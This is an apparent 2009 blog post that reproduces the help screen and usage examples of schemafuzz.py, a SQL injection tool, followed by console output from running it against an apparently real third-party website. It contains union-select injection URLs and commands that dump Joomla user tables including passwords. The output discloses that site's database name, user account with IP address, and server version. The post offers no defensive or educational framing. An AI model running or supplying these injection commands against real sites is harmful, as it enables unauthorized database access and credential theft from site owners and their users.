Wednesday, May 27, 2009

schemafuzz.py by rsauron

schemafuzz.py -h
Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"


schemafuzz.py -u http://www.ayamitiklembu/news.php?id=1 --findcol

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://www.ayamitiklembu/news.php?id=1--
[+] Evasion Used: "+" "--"
[+] 23:35:53
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.ayamitiklembu/news...+0,1,2,3--
[+] darkc0de URL: http://www.ayamitiklembu/news...rkc0de,2,3

[-] Done!

schemafuzz.py -u http://www.ayamitiklembu/news...rkc0de,2,3 --fuzz

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://www.ayamitiklembu/news...c0de,2,3--
[+] Evasion Used: "+" "--"
[+] 23:43:22
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web27-gc
User: web27-gc@79.170.40.171
Version: 5.0.77-community
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249

[+] Searching for tables and columns...

Reference:
http://www.hackforums.net/showthread.php?tid=79972

No comments:

LinkWithin

Related Posts with Thumbnails